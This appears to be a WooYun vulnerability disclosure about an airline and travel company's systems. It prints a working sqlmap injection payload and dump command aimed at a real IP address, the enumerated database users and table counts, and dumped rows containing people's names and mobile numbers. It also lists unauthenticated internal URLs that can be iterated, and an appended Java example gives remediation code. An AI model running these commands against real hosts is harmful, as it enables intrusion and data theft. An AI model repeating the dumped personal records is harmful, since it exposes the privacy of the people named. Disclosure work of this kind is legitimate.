WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2016-01-11: Details have been sent to the vendor and are awaiting the vendor's handling
2016-01-11: The vendor has confirmed; details are disclosed to the vendor only
2016-01-21: Details disclosed to core white hats and experts in related fields
2016-01-31: Details disclosed to regular white hats
2016-02-10: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public
As the title says.
1.
http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771
Injection point: q_routeid. Blind injection; the current database user has DBA privileges; the databases and user names were enumerated (the database names show the system belongs to Chunqiu, and the web page itself also shows this).
[11:02:39] [INFO] resuming back-end DBMS 'oracle'
[11:02:39] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: q_routeid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: u&u=1&q_routeid=42771 AND 4670=4670
---
[11:02:39] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[11:02:39] [INFO] testing if current user is DBA
[11:02:39] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
database management system users [36]:
[*] ANONYMOUS
[*] APPQOSSYS
[*] APPS
[*] BI_READ
[*] BI_TOUR
[*] BTRAVEL
[*] CHUNQIU
[*] CHUNQIU2
[*] CHUNQIU3
[*] CHUNQIU4
[*] CHUNQIU5
[*] CQGUID
[*] CRMDB
[*] DBSNMP
[*] DERBY_HOTEL
[*] DIP
[*] FINANCE
[*] HOTELCOMMENT
[*] LOGIN
[*] MONITOR
[*] MONITOR2
[*] MQ
[*] MQ2
[*] OAG
[*] ONLINEDB
[*] ORACLE_OCM
[*] ORDERDB
[*] OUTLN
[*] PRODUCTDB
[*] SYS
[*] SYSTEM
[*] TOUR
[*] WECHATDB
[*] WMSYS
[*] XDB
[*] XS$NULL
available databases [28]:
[*] APPQOSSYS
[*] APPS
[*] BTRAVEL
[*] CHUNQIU
[*] CHUNQIU2
[*] CHUNQIU3
[*] CHUNQIU4
[*] CHUNQIU5
[*] CQGUID
[*] CRMDB
[*] DBSNMP
[*] FINANCE
[*] HOTELCOMMENT
[*] LOGIN
[*] MONITOR2
[*] MQ
[*] MQ2
[*] OAG
[*] ONLINEDB
[*] ORDERDB
[*] OUTLN
[*] PRODUCTDB
[*] SYS
[*] SYSTEM
[*] TOUR
[*] WECHATDB
[*] WMSYS
[*] XDB
To demonstrate the severity I dumped part of the data; there is far too much to dump it all.
Database: CHUNQIU (very large data volume)
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| TBC_RP_CHANNEL | 15421067 |
| TBC_RP_CHANNEL_1007 | 14671619 |
| RECEPTIONORDERTOURISTLIST | 2715351 |
| MESSAGEBOARD | 2451570 |
| F_FTCONTROL_HIS | 2091578 |
| NETINSCHECKRECORDER | 1929755 |
| TB_NETINSURANCE | 1880966 |
| RECE_GROUPSCHEDULE | 1595737 |
| TB_INSURED | 1552746 |
| RESOURCE_TRAFFIC_ORDER | 1508648 |
| DGROUPFLOW | 1435419 |
| F_FTCONTROL | 1037837 |
| H_FIRM_GROUP | 735159 |
| F_HOTELORDERDETAIL | 633021 |
| RECEPTIONORDER | 608697 |
| TBC_ROUTE_CHANNEL | 497502 |
| FLIGHT_SALE | 466494 |
| RECEP_SCHEDULE | 459895 |
| TB_CREDIT_CUSTOMER | 453162 |
| DG01 | 412612 |
| R_ROUTEPLAN_SCHEDULE | 406140 |
| R_ORDER_LINE | 398298 |
| DJ_BRANCH | 374662 |
| RECE_STANDARD | 350724 |
| RECEP_SCENE_ARRA | 343802 |
| RECEP_SCENE_COST | 334070 |
| MESSAGEBOARD_H1 | 330486 |
| BAK_ROUTEPLANSCHEDULE | 321128 |
| TB_CREDIT_LOG | 304121 |
| RECEP_ORDER_GROUP | 291378 |
| RECEP_ORDER_GROUP2 | 254828 |
| RECEP_SPECIALPRICE | 250521 |
| F_HOTEL_ORDER | 248812 |
| IM_MESSAGE | 245913 |
| RECEP_RESTAURANT_COST | 242819 |
| RECEPGROUPINCOME | 221155 |
| RECEPTIONGROUP | 210643 |
| RECEPTIONGROUPINFO | 210448 |
| USERFUNC | 210024 |
| RECEP_HOTEL_COST | 200948 |
| R_ROUTEPLAN_GOAL | 198435 |
| BAK_ORDER_CHILD_LIST | 186280 |
| RECEP_HOTEL_ARRA | 182469 |
| RECEP_RESTAURANT_ARRA | 177022 |
| RECEP_ORDER_GROUP1 | 175320 |
| AFFICHE | 172069 |
| TB_CREDIT | 153068 |
| INSURANCE | 149259 |
| BAK_ORDER_HISTORY | 148081 |
| TBC_FTCONTROL_CHANNEL | 142118 |
| RECEP_SHOP_ARRA | 137721 |
| RECEP_SHOP_COST | 130056 |
| USERROLEFUNC_20141126 | 126942 |
| USERFUNC_20141125 | 115877 |
| USERFUNC_20141125_2 | 115877 |
| USERFUNC_20141125_1 | 115722 |
| USERFUNC_20141126 | 115722 |
| USERROLEFUNC | 114598 |
| USERROLEFUNC_20141125_1 | 110229 |
| R_ROUTEPLAN | 98140 |
| R_ROUTEPLAN_STANDARD | 98140 |
| RECEPGROUPSETTLEMENT | 97145 |
| RECEPGROUPSETTLEMENT1 | 97145 |
| RECEP_GROUP | 97021 |
| RECEP_STANDARD | 94587 |
| CICERONEARRA | 93077 |
| USERROLEFUNC_20141125_2 | 90642 |
| USERROLEFUNC_20141125 | 90640 |
| BAK_PLANCHILDRENPRICE | 87966 |
| BAK_ROUTEPLANTRAFFIC | 86578 |
| D_ROOMFEE_DETAIL | 81832 |
| R_ORDER_HEAD | 74984 |
| BAK_ROUTEPLANTRAFFICDETAIL | 74035 |
| AAA | 72597 |
| CALL_BOARD_H2 | 70707 |
| RECEP_MOTO_COST | 68221 |
| INSURANCE_COSTOMER | 68014 |
| DY_INGROUP | 66127 |
| ORDEROPHISTORY | 64132 |
| TB_CREDITBAK | 58716 |
| BAK_ROUTEPLAN | 54619 |
| F_ORDER | 54355 |
| BAK_ROUTEPLANRECEPTION | 52705 |
| BAK_ROUTEPLANBRANCH | 52562 |
| RECEP_OTHER_COST | 50093 |
| ORDERCOST | 48575 |
| ROUTEPLAN_UPDATE | 47442 |
| RECEP_COST_COUNT | 46342 |
| RECEP_MOTO_ARRA | 40750 |
| BAK_SIGNORDER | 39427 |
| TB_SECURITYS | 38921 |
| ROUTEPLANSCHEDULE | 37394 |
| F_HOTEL_ROOMTYPE | 37125 |
| F_HOTEL_ROOMTYPE_BAK | 35109 |
| CALL_BOARD | 31895 |
| SCHEDULED_FLIGHT_SALE_REPORT | 31389 |
| SCHEDULED_FLIGHT_SALE_REPORT2 | 31389 |
| ORDERTOURISTLIST | 30544 |
| ORDERTICKET | 29020 |
| ROUTEPLAN_BUS | 27927 |
| RECEP_OTHER_ARRA | 27503 |
| TB_CREDIT_BAK1126 | 24801 |
| BAK_ORDER_RECERVER | 21593 |
| F_FTCONTROL_HIS_BACK | 20399 |
| R_RECEP_GROUP_ARR | 20262 |
| USERS | 18329 |
| CHAINED_ROWS | 16906 |
| USERFUNC_BACK_070313 | 15908 |
| CALL_BOARD_H | 15846 |
| USERFUNC_BAK070305 | 15248 |
| USERS_20141125 | 14920 |
| USERS_MAPPING_20140928 | 14486 |
| USERS_BAK | 13880 |
| RECEP_SHOP | 13779 |
| BAK_ORDER_GROUP | 11802 |
| F_HOTELORDERPRICE | 11647 |
| F_HOTEL | 11119 |
| OL_R_ORDER_LINE_HIS | 10945 |
| USERS_MAPPING | 10492 |
| ROUTESCHEDULE | 10403 |
| F_HOTELORDERGUEST | 10233 |
| PLANCHILDRENPRICE | 10204 |
| D_ROOM_STATE | 9176 |
| ROUTEPLANTRAFFIC | 8578 |
| NETINSCHECKREC | 8388 |
| R_RECEP_GROUP | 8340 |
| ROUTEPLANTRAFFICDETAIL | 8132 |
| T_RESOURCE | 8016 |
| TRAFFICCLASS | 8016 |
| TRAFFICINFO | 8016 |
| RRP_RP | 7842 |
| R_ROUTE_SCHEDULE | 7712 |
| PERSONNEL | 7297 |
| F_HOTELORDERHEAD | 7281 |
| RECEP_HOTEL | 7277 |
| OL_R_ORDER_PAYMENT | 7008 |
| RECEP_LOAN_COST | 6857 |
| ROUTEPLANSCENE | 6853 |
| ROUTEPLAN | 6762 |
| SIGNORDER | 6515 |
| DEPT_FUNC | 6473 |
| PLANEINFO | 6425 |
| GROUPSETTLEMENT | 6244 |
| ROUTEPLANBRANCH | 5959 |
| ROUTEPLANRECEPTION | 5925 |
| AGENCY | 5599 |
| BAK_TRAVELGROUP | 5223 |
| TBC_ROOMTYPE_CHANNEL | 4519 |
| DY_TRAINING_EXPERIENCE | 4193 |
| OL_R_ORDER_HEAD_HIS | 4172 |
| D_ROOMFEE | 3944 |
| OL_R_ORDER_LINE | 3841 |
| USERS_BAK070305 | 3331 |
| DY_CICERONE | 3220 |
| ORDER_GROUP | 2980 |
| R_ORDER_LINE_H | 2941 |
| R_ROUTE_GOAL | 2936 |
| ORDERRECEIVERECORD | 2909 |
| RECEP_RESTAURANT | 2883 |
| RECEPGROUPCOST | 2844 |
| D_HOTEL_ROOM | 2241 |
| ROUTETRAFFIC | 2210 |
| USER_GROUP | 2206 |
| HOTEL | 2072 |
| ROUTETRAFFICDETAIL | 2061 |
| CHILDRENPRICE | 2056 |
| ROUTE | 1897 |
| RECEP_VIHICLE | 1842 |
| ROUTE_UPDATE | 1811 |
| R_ROUTE | 1804 |
| R_ROUTE_STANDARD | 1752 |
| R_ORDER_HISTORY | 1746 |
| DY_CICER_GROUP_SEQ | 1689 |
| USERS_RELATED | 1571 |
| CITY | 1522 |
| FUNCITEMS_IN | 1521 |
| FUNCITEMS | 1448 |
| OL_R_ORDER_HEAD | 1424 |
| FUNCITEMS_20141125 | 1415 |
| ROUTERECEPTIONQUOTE | 1332 |
| TRAVELGROUP | 1330 |
| ROUTEBRANCH | 1324 |
| DEPARTMENTS | 1322 |
| SCENE | 1319 |
| TRAININFO | 1300 |
| SCENE_BAK1126 | 1280 |
| RESTAURANT | 1172 |
| TESTQIU | 1169 |
| CITY_BAK1126 | 1159 |
| TBC_HOTEL_CHANNEL | 1141 |
| DEPARTMENTS_20141125 | 1116 |
| RESTAURANT_BAK1126 | 1102 |
| ROOMTYPE | 858 |
| DEPT_MANAGE | 843 |
| RECEP_SCENE_COST_SUBGROUP | 843 |
| ROOMFEE | 830 |
| RECEP_SCENE_ARRA_SUBGROUP | 804 |
| ROUTEPLANHOTEL | 763 |
| CUSTOMER | 731 |
| CICERONEDETAIL | 707 |
| MOTORTYPE | 706 |
| DY_RESUMN | 686 |
| SYSTEMROLES | 675 |
| SYSTEMROLES_20141125 | 661 |
| RECEP_RESTAURANT_ARRA_SUBGROUP | 572 |
| TEMP_5 | 564 |
| FUNCITEMS_BACK | 544 |
| FUNCITEMS_BAK070305 | 544 |
| R_ORDER_HEAD_H | 502 |
| SETTING | 492 |
| FUNCITEMS_BACK_070313 | 479 |
| F_HOTEL_PAY | 469 |
| TBC_CHANNEL | 446 |
| SHOP | 441 |
| SYSTEMROLES_BAK070305 | 440 |
| SHOP_BAK1126 | 428 |
| DY_REWARDS_PUNISHMENTS | 398 |
| BK_TEMP_TABLE_20100818 | 378 |
| RECEP_RESTAURANT_COST_SUBGROUP | 351 |
| DY_CICER_TRAINING | 349 |
| D_ORDER_FAX | 334 |
| D_ORDER | 315 |
| D_ORDER_LINE | 297 |
| RECEPTIONSUBGROUP | 280 |
| MOTORCADE | 273 |
| INSURANCE_TYPE | 256 |
| GROUP_FUNC | 255 |
| RECEP_SHOP_COST_SUBGROUP | 253 |
| SMSBOX | 241 |
| MOTORCADE_BAK1126 | 238 |
| F_HOTEL_TYPE | 224 |
| TB_CONTRACT | 221 |
| NETINSCHECKRECORDER_EXCEPTION | 220 |
| PERSONNEL_SHMS | 220 |
| ROUTESCENE | 220 |
| USERS_SHMS | 220 |
| COUNTRY | 201 |
| COUNTRY_IN | 201 |
| OTHERRESOURCEDETAIL | 200 |
| SHIPINFO | 199 |
| OTHERRESOURCE | 176 |
| BRANCH | 168 |
| OTHERRESOURCE_BAK1126 | 163 |
| ROUTETYPE | 153 |
| FLIGHT_PLAN | 151 |
| TRAFFICPRICE | 147 |
| PROVINCE | 136 |
| DY_CICERTRAIN_SCORE | 133 |
| TEMP_6 | 127 |
| TEMP_7 | 126 |
| TB_DICTIONARY | 123 |
| RECEP_OTHER_ARRA_SUBGROUP | 120 |
| TEMP1 | 118 |
| DY_SETTING | 113 |
| RECEP_OTHER_COST_SUBGROUP | 104 |
| BRANCH_20141125 | 102 |
| RECEP_HOTEL_COST_SUBGROUP | 101 |
| TB_DICTIONARY_BAK | 97 |
| FLIGHT_GRADE | 59 |
| EXCEPTIONRECORD | 56 |
| RECEP_HOTEL_ARRA_SUBGROUP | 56 |
| F_HOTEL_PRICE | 50 |
| DY_TRAINING | 49 |
| DEPARTMENTS_SHMS | 48 |
| ROUTEHOTEL | 46 |
| RECEPGROUPCOSTINFO | 41 |
| FLIGHT_GRADE_STAND | 35 |
| PARAMETERS | 34 |
| BRANCH_DAY_REPORT | 30 |
| INSURANCE_CANCEL | 30 |
| RECE_GROUPHOTEL | 29 |
| RECE_GROUPVEHICLE | 27 |
| FEETYPE2 | 24 |
| ORDER_CUST | 23 |
| RECE_GROUPRESTAURANT | 20 |
| TBC_ACTION | 19 |
| RECE_GROUPSHOP | 15 |
| DY_CICERTEST_SUBJECT | 13 |
| IM_FRIEND | 12 |
| RECEP_SHOP_ARRA_SUBGROUP | 12 |
| F_STAR | 11 |
| D_RANK_TYPE | 10 |
| FUNCTYPES | 9 |
| RECE_GROUPSCENE | 9 |
| BAOTUANHEAD | 8 |
| BAOTUANLINE | 8 |
| H_RECEPTIONGROUP | 8 |
| TB_CREDIT_SET_LOG | 8 |
| CONTINENT | 7 |
| FEETYPE1 | 7 |
| GROUPS | 7 |
| QUALITY_SURVEY | 7 |
| SCHEDULED_FLIGHT_PARAMETER | 6 |
| INSURANCE_ORG | 5 |
| NETWORK | 5 |
| RESOURCETYPE | 5 |
| TB_CREDITTYPE | 5 |
| D_PAYMENTTYPE | 4 |
| T_PORT | 4 |
| TB_CREDIT_SET | 4 |
| CLASSINFO | 3 |
| CUS_TYPE | 3 |
| D_SALE_RANK | 3 |
| RESERVEDORDERHEAD | 3 |
| RESERVEDORDERLINE | 3 |
| "RECEPTIONORDER#M1" | 2 |
| IM_ORDER_SETTING | 2 |
| QUALITY_SURVEY_SUB | 2 |
| RECEPTIONORDERSETTLEMENT | 2 |
| ROOMINFO | 2 |
| TB_CREDIT_USE_LOG | 2 |
| "RECEPTIONGROUP#M1" | 1 |
| BASIC_IP | 1 |
| F_HOTEL_INVENTORY | 1 |
| RECEPGROUPSETTLEDATE | 1 |
| ROUTERESTAURANT | 1 |
| TB_CREDIT_ACCOUNT | 1 |
| TB_CREDIT_USE | 1 |
| TEST0627 | 1 |
| TEST2011 | 1 |
| TEST2012 | 1 |
| TOURTYPE | 1 |
+--------------------------------+---------+
Database: BTRAVEL
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| BALANCE_ALL_FLIGHTS | 1709032 |
| BALANCE_ALL | 1219621 |
| BALANCE_BILL_ALL | 1185535 |
| BALANCE_ALL_REPORT | 1170999 |
| T_RECORD_FLIGHTS | 678671 |
| T_OPERATE_HIS | 644726 |
| T_RESERVATION_AUTHORIZATION | 562797 |
| T_RECORD_JOURNEY | 514012 |
| BALANCE_PNR_HIS | 440229 |
| BALANCE_OVERMONEY_KIND | 260804 |
| T_RESERVATION_AIRTICKET | 258835 |
| T_RESERVATION_JOURNEY | 258425 |
| T_RESERVATION_SUBORDER | 257952 |
| T_SUBORDER_PNR | 257952 |
| T_RESERVATION_ORDER_FINANCE | 255222 |
| BALANCE_ALL_CUSTOMER | 247060 |
| T_RESERVATION_PNR | 219529 |
| T_RESERVATION_MAINORDER | 132687 |
| BALANCE_BILL | 46929 |
| T_CUSTOMER_DOCUMENT | 27317 |
| T_CUSTOMER | 24908 |
| T_CUSTOMER_CONTACT | 20189 |
| T_CUSTOMER_CENTER | 18566 |
| BALANCE_ALL_HIS | 8062 |
| BALANCE_NET_CUSTOMER | 4481 |
| BALANCE_NET_ORDER | 3879 |
| T_BASIC_AIRPORTAREA | 1521 |
| BALANCE_NET_FLIGHTS | 1034 |
| BALANCE_CUSTOMER_INFO | 1013 |
| T_CUSTOMER_COMPANY | 864 |
| T_CUSTOMER_DEPARTMENT | 741 |
| BALANCE_DEPT | 583 |
| T_SUPPOSE_FLIGHT | 570 |
| T_SUPPOSE_AIRTICKET | 499 |
| T_SUPPOSE_JOURNEY | 493 |
| BALANCE_PERSONNEL | 123 |
| BALANCE_AIRWAYS | 103 |
| T_DICT_ITEM | 45 |
| T_CONFIRM_REASON | 30 |
| BALANCE_TICKETS_TYPE | 25 |
| BALANCE_CUSTOMER_DEPT | 20 |
| BALANCE_DEPT_TYPE | 11 |
| BALANCE_CUSTOMER_GROUP | 10 |
| BALANCE_KIND | 9 |
| T_POLICY_REASON | 9 |
| BALANCE_CUSTOMER_IDTYPE | 5 |
| BALANCE_TYPE | 3 |
| T_ACCOUNTING | 3 |
| BALANCE_FLAG | 2 |
| T_BALANCE_FINANCE | 2 |
| T_CUSTOMER_POLICY | 2 |
| T_DEPARTMENT_POLICY | 2 |
| T_CUSTOMER_POSITION | 1 |
| T_POLICY | 1 |
+-----------------------------+---------+
Database: CRMDB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| TB_MEMBER_PASSENGER | 7163428 |
| TB_MEMBER_ABNORMAL | 5633946 |
| TB_MEMBER_DOCUMENT | 4446875 |
| TB_MEMBER_BUSINESS_ASSOCIATION | 3866032 |
| TB_MEMBER_BASIC_INFO | 2233672 |
| TB_MEMBER_B_ASSOCIATION_T | 665485 |
| TB_MEMBER_BANDING_CAST | 436288 |
| TB_MEMBER_LOGIN_TIME | 96638 |
| TB_MEMBER_GROWTH | 49367 |
| TB_MEMBER_ADDRESS | 17867 |
| TB_MEMBER_HEAD | 7091 |
| TB_MEMBER_GROUP | 402 |
| TB_MEMBER_OPERATE_LOG | 105 |
| TB_COMMON_MST | 34 |
| TB_GROUP_MANAGEMENT | 19 |
| TB_MEMBER_LABEL | 13 |
| TB_LABEL_MANAGEMENT | 8 |
| TB_MEMBER_INSTITUTION | 4 |
| TB_MEMBER_BLACKLIST_DOCUMENT | 3 |
| TB_MEMBER_INS_GROUP | 3 |
| TB_MEMBER_BLACKLIST | 1 |
| TB_MEMBER_INSTITUTION_BILL | 1 |
+--------------------------------+---------+
sqlmap command: python sqlmap/sqlmap.py -u "http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771" --dump --start 1 --stop 3 -T T_CUSTOMER -D BTRAVEL
Proof that the data exists (user data, order data, etc.):
Database: BTRAVEL
Table: T_CUSTOMER
[3 entries]
+----+----------+------------+------------+-------------+---------------+------+------+------+-------+--------+-------------+---------+----------+-----------+------------+-------------+-------------+--------------+---------------+-----------------+-------------------+-------------------+
| ID | STAFF_ID | COMPANY_ID | CREATOR_ID | MODIFIER_ID | DEPARTMENT_ID | BL | PL | TYPE | STATE | GENDER | NAME_EN | NAME_CN | LOCATION | VERSION | POSITION | BLUE_COLLAR | LOCAL_EXPAT | LEGAL_ENTITY | CREATION_DATE | COST_CENTRE_SAP | MODIFICATION_DATE | EXACT_COST_CENTRE |
+----+----------+------------+------------+-------------+---------------+------+------+------+-------+--------+-------------+---------+----------+-----------+------------+-------------+-------------+--------------+---------------+-----------------+-------------------+-------------------+
| 2 | NULL | 2009 | NULL | 96708 | 185 | NULL | NULL | 1 | 0 | 1 | MA/XIAOMING | 马晓鸣 | NULL | 2 | NULL | NULL | NULL | NULL | NULL | NULL | 07-JAN-11 | NULL |
| 3 | NULL | 2009 | NULL | 96998 | 164 | NULL | NULL | 1 | 0 | 2 | MA/YIXUAN | 马毅璇 | NULL | 6 | NULL | NULL | NULL | NULL | NULL | NULL | 10-MAR-15 | NULL |
| 4 | NULL | 2009 | NULL | 96297 | 167 | NULL | NULL | 1 | 1 | 1 | MIN/RUI | 闵锐 | NULL | 4 | NULL | NULL | NULL | NULL | NULL | NULL | 16-FEB-12 | NULL |
+----+----------+------------+------------+-------------+---------------+------+------+------+-------+--------+-------------+---------+----------+-----------+------------+-------------+-------------+--------------+---------------+-----------------+-------------------+-------------------+
Database: BTRAVEL
Table: T_CUSTOMER_CONTACT
[3 entries]
+----+------------+-------------+-------------+-----------+-------------+-------------+--------------+---------------+-------------------+
| ID | CREATOR_ID | CUSTOMER_ID | MODIFIER_ID | VERSION | CONTACT_NO | DESCRIPTION | CONTACT_TYPE | CREATION_DATE | MODIFICATION_DATE |
+----+------------+-------------+-------------+-----------+-------------+-------------+--------------+---------------+-------------------+
| 4 | 30017 | 24356 | 91011 | 2 | 13817835952 | NULL | 2 | 21-JAN-10 | 22-MAR-10 |
| 6 | 96445 | 27741 | NULL | 1 | 13426415261 | NULL | 2 | 04-MAR-10 | NULL |
| 7 | 96708 | 28717 | NULL | 1 | 13816977534 | NULL | 2 | 05-MAR-10 | NULL |
+----+------------+-------------+-------------+-----------+-------------+-------------+--------------+---------------+-------------------+
Database: BTRAVEL
Table: BALANCE_BILL_ALL
[3 entries]
+---------+---------+----------+--------------+-----------------+-----------------+-----------------+--------+------------+---------+-----------+------------+--------------+--------------+---------------+---------------+----------------+-------------------+
| DEPT_ID | BILL_ID | PLACE_ID | PERSONNEL_ID | TICKETS_TYPE_ID | DISPOSE_USER_ID | RECOVER_USER_ID | IS_USE | BILL_NO | AIRWAYS | USE_DATE | IS_DISPOSE | DISPOSE_DATE | RECOVER_DATE | BILL_INPUT_NO | BILL_TERMINAL | DISPOSE_REMARK | BALANCE_BILL_TYPE |
+---------+---------+----------+--------------+-----------------+-----------------+-----------------+--------+------------+---------+-----------+------------+--------------+--------------+---------------+---------------+----------------+-------------------+
| 2 | 1586 | NULL | 96578 | 3 | NULL | NULL | Y | 4936008080 | 784 | 17-APR-07 | N | NULL | NULL | NULL | 0 | NULL | NULL |
| 2 | 1587 | NULL | 96578 | 3 | NULL | NULL | Y | 4936008081 | 784 | 17-APR-07 | N | NULL | NULL | NULL | 0 | NULL | NULL |
| 2 | 1588 | NULL | 96578 | 3 | 96578 | NULL | Y | 4936008082 | 784 | 17-APR-07 | N | 17-APR-07 | NULL | NULL | 0 | NULL | NULL |
+---------+---------+----------+--------------+-----------------+-----------------+-----------------+--------+------------+---------+-----------+------------+--------------+--------------+---------------+---------------+----------------+-------------------+
2. Unauthorized access to the MIS system
http://mis.9cair.com/mis2/wp/sopIndex.jsp?taskNo=M05761
http://mis.9cair.com/mis2/wp/sopServelt.do?method=showSopPriter&sopSeq=1299
Iterating over the sequence numbers would extend the impact further.
http://mis.9cair.com/mis2/wp/innerindex.jsp
http://mis.9cair.com/mis2/wp/wpServelt.do?method=getStationAndProject&printId=%271%27
FOC system
http://fcs.9cair.com/flyer/alcoholtest/view/index-success.html
http://foc.9cair.com/Frame/Dispatch/weather/weatherMonitor.do (weather map monitoring data)
Demonstrated above. PS: there is too much data and I did not dump all of it; the impact is still fairly serious. If this is not enough, I can provide more.
1. SQL injection: filter sensitive characters
2. Unauthorized access: verify permissions
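The two remediations above, worked out as an added example rather than code from this report or from the vendor's application: for finding 1, a Servlet/JSP handler that validates q_routeid as an integer and binds it through a PreparedStatement (parameter binding is used here in place of the character filtering the report suggests, since a bound parameter cannot change the SQL text at all); for finding 2, a servlet Filter that refuses requests under /mis2/wp/* without an authenticated session, plus a per-record check so that a logged-in user cannot simply walk sopSeq values. The page names only the tables and request parameters; the ROUTE_ID column, the SOP_TASK table with its DEPT_ID column, the class names and the authenticatedUser session attribute are assumptions.

```java
// Added example (not the vendor's code): the two fixes recommended in the report,
// written for a Servlet 2.5 / JSP application like the one sqlmap fingerprinted.
import java.io.IOException;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class ReportFixes {

    // ---- Finding 1: SQL injection in q_routeid ------------------------------------

    /** The pattern the sqlmap result implies: the raw parameter is pasted into the SQL
     *  text, so "42771 AND 4670=4670" is parsed as SQL and the true/false outcome leaks
     *  through the page. Kept only for contrast with the hardened form below. */
    static String vulnerableSql(String qRouteId) {
        return "SELECT * FROM R_ROUTE_SCHEDULE WHERE ROUTE_ID = " + qRouteId; // column assumed
    }

    /** Reject anything that is not a plain integer id before the database sees it. */
    static long parseRouteId(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,18}")) {
            throw new IllegalArgumentException("q_routeid must be a positive integer");
        }
        return Long.parseLong(raw);
    }

    /** Hardened query: the id is bound as a typed parameter, so even a value that slipped
     *  past validation could only ever be compared as a number, never executed as SQL. */
    static ResultSet routeSchedule(Connection conn, String qRouteId) throws SQLException {
        long routeId = parseRouteId(qRouteId);
        PreparedStatement ps = conn.prepareStatement(
            "SELECT * FROM R_ROUTE_SCHEDULE WHERE ROUTE_ID = ?"); // column name assumed
        ps.setLong(1, routeId);
        return ps.executeQuery();
    }

    // ---- Finding 2: unauthenticated MIS/FOC pages ---------------------------------

    /** Filter mapped (in web.xml) to /mis2/wp/* and the equivalent prefixes on the foc/fcs
     *  hosts. Every request under those paths needs an authenticated session, so a newly
     *  added JSP or .do action is protected by default instead of being reachable until
     *  someone remembers to add a check to it. */
    public static class RequireLoginFilter implements Filter {
        static final String USER_ATTR = "authenticatedUser"; // session attribute name assumed

        @Override public void init(FilterConfig config) {}
        @Override public void destroy() {}

        @Override
        public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
                throws IOException, ServletException {
            HttpServletRequest request = (HttpServletRequest) req;
            HttpServletResponse response = (HttpServletResponse) resp;
            HttpSession session = request.getSession(false); // never create one here
            if (session == null || session.getAttribute(USER_ATTR) == null) {
                response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
                return;
            }
            chain.doFilter(req, resp);
        }
    }

    /** Login alone does not stop an authenticated user from walking sopSeq=1,2,3,...;
     *  each record must also be tied to the requester. Table and columns are assumed. */
    static boolean mayViewSop(Connection conn, long sopSeq, long requesterDeptId)
            throws SQLException {
        try (PreparedStatement ps = conn.prepareStatement(
                "SELECT 1 FROM SOP_TASK WHERE SOP_SEQ = ? AND DEPT_ID = ?")) {
            ps.setLong(1, sopSeq);
            ps.setLong(2, requesterDeptId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next(); // true only if the record belongs to the requester's unit
            }
        }
    }
}
```

The filter is registered with a filter-mapping whose url-pattern is /mis2/wp/* so it runs ahead of every JSP and .do action in that path; the login page itself must sit outside the protected prefix, and showSopPriter-style handlers call mayViewSop after the filter has established who is asking.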
Severity: High
Vulnerability Rank: 12
Confirmed at: 2016-01-11 17:36
Thank you, received.
None yet.